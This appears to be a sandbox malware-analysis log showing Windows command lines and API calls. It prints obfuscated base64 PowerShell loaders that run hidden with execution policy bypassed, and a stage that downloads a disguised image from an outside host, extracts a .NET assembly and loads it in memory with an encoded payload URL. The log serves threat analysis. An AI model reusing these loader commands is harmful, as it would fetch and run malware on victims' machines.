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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('oUfwwBJMv','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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JMvkoUfwwBJMvHMoUfwwBJMvdoUfwwBJMvBhoUfwwBJMvHIoUfwwBJMvdoUfwwBJMvBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvGcoUfwwBJMvZQoUfwwBJMvgoUfwwBJMvDoUfwwBJMvoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvGEoUfwwBJMvbgBkoUfwwBJMvCoUfwwBJMvoUfwwBJMvJoUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvGcoUfwwBJMvdoUfwwBJMvoUfwwBJMvgoUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEkoUfwwBJMvbgBkoUfwwBJMvGUoUfwwBJMveoUfwwBJMvoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEkoUfwwBJMvbgBkoUfwwBJMvGUoUfwwBJMveoUfwwBJMvoUfwwBJMvgoUfwwBJMvCsoUfwwBJMvPQoUfwwBJMvgoUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEYoUfwwBJMvboUfwwBJMvBhoUfwwBJMvGcoUfwwBJMvLgBMoUfwwBJMvGUoUfwwBJMvbgBnoUfwwBJMvHQoUfwwBJMvaoUfwwBJMvoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvYgBhoUfwwBJMvHMoUfwwBJMvZQoUfwwBJMv2oUfwwBJMvDQoUfwwBJMvToUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZwB0oUfwwBJMvGgoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvJoUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvCoUfwwBJMvoUfwwBJMvJoUfwwBJMvBzoUfwwBJMvHQo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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('oUfwwBJMv','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LkJOSC9zd29kbml3LzE5LjYuODkuMTQxLy86cHR0aA==' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
wmi SELECT * FROM Win32_Processor
wmi select * from Win32_OperatingSystem
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2164
thread_handle: 0x000002f4
process_identifier: 2160
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JoUfwwBJMvBpoUfwwBJMvG0oUfwwBJMvYQBnoUfwwBJMvGUoUfwwBJMvVQByoUfwwBJMvGwoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvJwBooUfwwBJMvHQoUfwwBJMvdoUfwwBJMvBwoUfwwBJMvHMoUfwwBJMvOgoUfwwBJMvvoUfwwBJMvC8oUfwwBJMvaQBtoUfwwBJMvGEoUfwwBJMvZwBloUfwwBJMvHUoUfwwBJMvcoUfwwBJMvBsoUfwwBJMvG8oUfwwBJMvYQBkoUfwwBJMvC4oUfwwBJMvaQBvoUfwwBJMvC8oUfwwBJMvaQBioUfwwBJMvC8oUfwwBJMvdwBzoUfwwBJMvDgoUfwwBJMvTQBBoUfwwBJMvEooUfwwBJMvNgBloUfwwBJMvHoUfwwBJMvoUfwwBJMvdoUfwwBJMvBpoUfwwBJMvEwoUfwwBJMvZgBHoUfwwBJMvHUoUfwwBJMvXwoUfwwBJMvxoUfwwBJMvDYoUfwwBJMvOQoUfwwBJMv3oUfwwBJMvDcoUfwwBJMvMwoUfwwBJMv4oUfwwBJMvDQoUfwwBJMvOQoUfwwBJMvyoUfwwBJMvC4oUfwwBJMvagBwoUfwwBJMvGcoUfwwBJMvJwoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvdwBloUfwwBJMvGIoUfwwBJMvQwBsoUfwwBJMvGkoUfwwBJMvZQBuoUfwwBJMvHQoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvTgBloUfwwBJMvHcoUfwwBJMvLQBPoUfwwBJMvGIoUfwwBJMvagBloUfwwBJMvGMoUfwwBJMvdoUfwwBJMvoUfwwBJMvgoUfwwBJMvFMoUfwwBJMveQBzoUfwwBJMvHQoUfwwBJMvZQBtoUfwwBJMvC4oUfwwBJMvTgBloUfwwBJMvHQoUfwwBJMvLgBXoUfwwBJMvGUoUfwwBJMvYgBDoUfwwBJMvGwoUfwwBJMvaQBloUfwwBJMvG4oUfwwBJMvdoUfwwBJMvoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvaQBtoUfwwBJMvGEoUfwwBJMvZwBloUfwwBJMvEIoUfwwBJMveQB0oUfwwBJMvGUoUfwwBJMvcwoUfwwBJMvgoUfwwBJMvD0oUfwwBJMvIoUfwwBJMvoUfwwBJMvkoUfwwBJMvHcoUfwwBJMvZQBioUfwwBJMvEMoUfwwBJMvboUfwwBJMvBpoUfwwBJMvGUoUfwwBJMvbgB0oUfwwBJMvC4oUfwwBJMvRoUfwwBJMvBvoUfwwBJMvHcoUfwwBJMvbgBsoUfwwBJMvG8oUfwwBJMvYQBkoUfwwBJMvEQoUfwwBJMvYQB0oUfwwBJMvGEoUfwwBJMvKoUfwwBJMvoUfwwBJMvko